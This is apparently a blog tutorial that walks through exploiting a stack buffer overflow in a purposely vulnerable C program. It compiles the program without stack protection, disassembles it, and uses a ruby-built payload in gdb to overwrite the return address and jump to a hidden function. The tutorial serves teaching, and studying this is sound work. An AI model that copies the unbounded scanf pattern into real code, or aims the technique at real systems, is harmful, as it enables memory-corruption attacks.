Introduction
This article provides a hands-on guide to exploiting a buffer overflow, one of the most well-known and impactful software vulnerabilities. You'll learn how an attacker can manipulate a program's memory to execute arbitrary code, bypassing its intended behavior. By the end, you'll understand the mechanics behind buffer overflows and how they can lead to serious security risks.
Prerequisites
To follow along, you should have:
- A basic understanding of C programming, including pointers and memory management.
- Familiarity with the Linux command line and tools such as
gcc
andgdb
. - A general understanding of computer architecture, specifically the stack and how functions are called.
Although the code used for this demonstration is not inherently dangerous, it is best to perform the exploitation in a controlled environment. That way, we’ll be ready when things get more interesting.
What is a Buffer Overflow?
A buffer overflow is a vulnerability in software that occurs when a program writes more data to a fixed-length block of memory (a buffer) than it is designed to hold. This can cause unintended behavior, including crashes, data corruption, or even exploitation by attackers to gain control of the system.
Buffer overflows occur when a program writes more data to a buffer than it can hold, leading to adjacent memory being overwritten. This can overwrite function return addresses, which can be manipulated by an attacker to redirect program control to arbitrary locations, such as malicious code or a ‘secret’ function.
Stack Memory Layout and Function calls
To understand how a buffer overflow can be exploited, we need to examine how the stack changes when a function is called.
Function Prologue
When a function is called, the following steps occur:
- The return address (where execution should continue after the function ends) is pushed onto the stack.
- The base pointer (
rbp
) of the previous function is saved to keep track of the caller's stack frame. - The stack pointer (
rsp
) is adjusted to allocate space for local variables.
For example, when calling the echo()
function in our vulnerable program, the stack initially looks like this:
| Local Buffer (32 bytes) |
| Saved %rbp (from main) |
| Return Address (to main) | <- %rip
Note that the buffer is 20 bytes but the stack allocated 32 bytes (sub $0x20, %rsp
).
Understanding Key Registers
To fully grasp how buffer overflows work, let's review the key registers involved:
-
rbp
(Base Pointer): Holds the base address of the current function's stack frame. Used to access function parameters and local variables. -
rsp
(Stack Pointer): Points to the top of the stack, growing downwards as new data is pushed. -
rip
(Instruction Pointer): Holds the address of the next instruction to be executed. Overwriting this register allows an attacker to redirect execution.
Function Epilogue
When the function ends:
The base pointer (
rbp
) is restored.The stack pointer (
rsp
) is adjusted to remove the local variables.The function returns to the stored return address (
ret
instruction), resuming execution.
If an attacker overwrites the return address, they can control where execution continues.
Exploitation
Vulnerable code
#include <stdio.h>
void secret() {
printf("Oops, you weren't supposed to see this 0_0!\n");
}
void echo() {
char buffer[20];
printf("What's your name?\n");
scanf("%s", buffer);
printf("Hello, %s!\n", buffer);
}
int main(int argc, char* argv[]) {
echo();
return 0;
}
Compile the code with the following flags for static memory addresses and no stack protection:
-
static
: for static memory addresses -
fno-stack-protector
: for no stack addresses protection
all:
gcc -static vuln.c -o vuln -fno-stack-protector
clean:
rm vuln.c
To identify the address of the secret function, decompile the binary using objdump
:
objdump -d vuln
After this, we will see a bunch of ASM code, but we will focus on the following section.
0000000000401905 <secret>:
401905: f3 0f 1e fa endbr64
401909: 55 push %rbp
40190a: 48 89 e5 mov %rsp,%rbp
40190d: 48 8d 05 1c b7 09 00 lea 0x9b71c(%rip),%rax # 49d030 <__rseq_flags+0x2c>
401914: 48 89 c7 mov %rax,%rdi
401917: e8 34 1a 01 00 call 413350 <_IO_puts>
40191c: 90 nop
40191d: 5d pop %rbp
40191e: c3 ret
000000000040191f <echo>:
40191f: f3 0f 1e fa endbr64
401923: 55 push %rbp
401924: 48 89 e5 mov %rsp,%rbp
401927: 48 83 ec 20 sub $0x20,%rsp
40192b: 48 8d 05 2a b7 09 00 lea 0x9b72a(%rip),%rax # 49d05c <__rseq_flags+0x58>
401932: 48 89 c7 mov %rax,%rdi
401935: e8 16 1a 01 00 call 413350 <_IO_puts>
40193a: 48 8d 45 e0 lea -0x20(%rbp),%rax
40193e: 48 89 c6 mov %rax,%rsi
401941: 48 8d 05 26 b7 09 00 lea 0x9b726(%rip),%rax # 49d06e <__rseq_flags+0x6a>
401948: 48 89 c7 mov %rax,%rdi
40194b: b8 00 00 00 00 mov $0x0,%eax
401950: e8 9b 34 00 00 call 404df0 <__isoc99_scanf>
401955: 48 8d 45 e0 lea -0x20(%rbp),%rax
401959: 48 89 c6 mov %rax,%rsi
40195c: 48 8d 05 0e b7 09 00 lea 0x9b70e(%rip),%rax # 49d071 <__rseq_flags+0x6d>
401963: 48 89 c7 mov %rax,%rdi
401966: b8 00 00 00 00 mov $0x0,%eax
40196b: e8 50 35 00 00 call 404ec0 <_IO_printf>
401970: 90 nop
401971: c9 leave
401972: c3 ret
At the beginning of the echo
function, we can see how the compiler reserves 32 bytes in the stack (sub $0x20,%rsp
). Then, the current state of the stack is:
| Local Buffer (32 bytes) |
| Saved %rbp (from main) |
| Return Address (to main) | <- %rip
In our C code, there are no bounds, so what if we enter a string longer than 20 characters?
If we enter 20 to 31 characters, nothing will happen since we are inside the stack section enabled for the buf
variable, even though the string length is 20. But if we go with more characters, we get a segmentation fault, let's inspect it using gdb to find out what is going on there. We can create a payload using, for example, ruby
.
ruby -e 'print "a"*40 + "\xFE\xCA\x00\x00\x00\x00\x00\x00"' > input_data
Now, if we start a debugging session on gdb
of our executable, and pass the payload as input.
(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�
Program received signal SIGSEGV, Segmentation fault.
0x000000000000cafe in ?? ()
(gdb) x $rip
0xcafe: Cannot access memory at address 0xcafe
We can see that we have just overwritten the $rip
register. We get a SISGENV, and nothing interesting happens, but what if we set $rip
to a valid direction?
From the assembly code of our decompiled binary, we know that the address of secret
is 0x401905
:
0000000000401905 <secret>
...
We update the payload generation.
ruby -e 'print "a"*40 + "\x05\x19\x40\x00\x00\x00\x00\x00"' > input_data
As before, we execute the binary and pass the payload as input:
(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
Downloading separate debug info for system-supplied DSO at 0x7ffff7ffd000
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@!
Oops, you weren't supposed to see this 0_0!
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe000 in ?? ()
We are getting a SIGSEGV this time, but the secret
function is being executed now.
Top comments (0)